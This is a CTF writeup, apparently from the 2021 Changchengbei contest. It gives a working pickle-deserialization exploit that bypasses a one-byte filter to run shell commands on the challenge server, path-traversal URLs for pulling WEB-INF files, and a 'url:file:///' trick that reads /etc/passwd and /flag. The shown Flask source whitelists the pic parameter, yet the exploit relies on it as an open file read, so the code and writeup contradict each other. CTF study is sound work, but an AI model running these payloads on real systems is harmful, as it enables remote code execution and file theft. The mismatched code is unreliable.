2021长城杯

ez_python

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

# The WSGI application object; the module name is the import name Flask
# uses to locate templates (index.html is rendered from it below).
app = Flask(import_name=__name__)

class User:
    """Plain record of a name and an age; no validation is performed."""

    def __init__(self, name, age):
        # Stored as given: nothing in this file reads either attribute back.
        self.name, self.age = name, age

def check(s):
    """Return 1 if the raw cookie bytes *s* contain no ``b'R'``, else 0.

    Security note: this blocks exactly one byte of the pickle stream.  It is
    not a safe gate for ``pickle.loads`` on attacker-controlled data (the
    writeup on this page shows a stream that passes it); the real fix is to
    never unpickle untrusted input.
    """
    return 0 if b'R' in s else 1


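@app.route("/")
def index():
    """Render ``index.html`` with a greeting name and one inline image.

    The name comes from the ``user`` cookie: base64 of a pickle whose
    result is indexed with ``"username"``.  A cookie that ``check`` rejects
    yields ``"bad,bad,hacker"``; any decode/unpickle/lookup failure yields
    ``"CTFer"``.  The image is selected by the ``pic`` query parameter,
    limited to the bundled ``1.jpg`` .. ``7.jpg``; any other value, or no
    value, falls back to one of those chosen at random.
    """
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            # SECURITY: pickle.loads on cookie data the client controls is
            # arbitrary code execution; the single-byte filter in check()
            # does not change that. A signed cookie or JSON should replace
            # pickle here.
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except Exception:
        # No/undecodable cookie, an unpickling failure, or a result that is
        # not subscriptable all fall back to the anonymous name.
        username = "CTFer"

    # The request argument must not reach open() directly: that is an
    # arbitrary file read. Accept only the bundled image names.
    allowed = {'{0}.jpg'.format(i) for i in range(1, 8)}
    pic = request.args.get('pic')
    if pic not in allowed:
        pic = '{0}.jpg'.format(random.randint(1, 7))
    with open(pic, 'rb') as f:
        p = base64.b64encode(f.read()).decode()

    return render_template('index.html', uname=username, pic=p)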


if __name__ == "__main__":
    # Development server bound on every interface, port 8888; no debug
    # flag is passed, so the Werkzeug debugger is not exposed by this line.
    app.run(host='0.0.0.0', port=8888)

定位一下关键函数pickle

考点就呼之欲出了：pickle 反序列化，绕过对 R 字符的检查

user = pickle.loads(user)

有现成的链子可以直接打

# Writeup's proof of concept against the challenge instance: the cookie
# carries a hand-built pickle stream that avoids the one byte check()
# rejects, and the result is read back through the same unrestricted
# ``pic`` file-read parameter. Defender's takeaway: a byte blocklist on
# pickle data and an open() on a request argument are both not mitigations.
import requests
import pickle
import base64
#e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)  # unused; the stream below is assembled by hand
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://eci-2zedqu5w4d2328dulcrt.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
                        cookies=dict(
                            user=base64.b64encode(payload).decode()))
print(response.text)
# The page embeds the requested file base64-encoded (presumably as a
# ``data:`` URI, judging by the split on the comma); take the second
# comma-separated field of the quoted attribute and decode it.
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

java_url

Java 项目下都有一个配置文件可以下载

/download?filename=../../../../WEB-INF/web.xml

然后就可以拿到很多路由
接下来下载源码

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/testURL.class

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/download.class

在审计源码的时候可以看到

String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {

第一个冒号前的部分不能是上面这三种协议，所以要找一个可以放在 file 协议前面、却又不会报错的前缀

url:file:///etc/passwd
url:file:///
url:file:///flag

这样就可以了

Author

vague huang

Posted on

2021-09-19

Updated on

2021-09-19
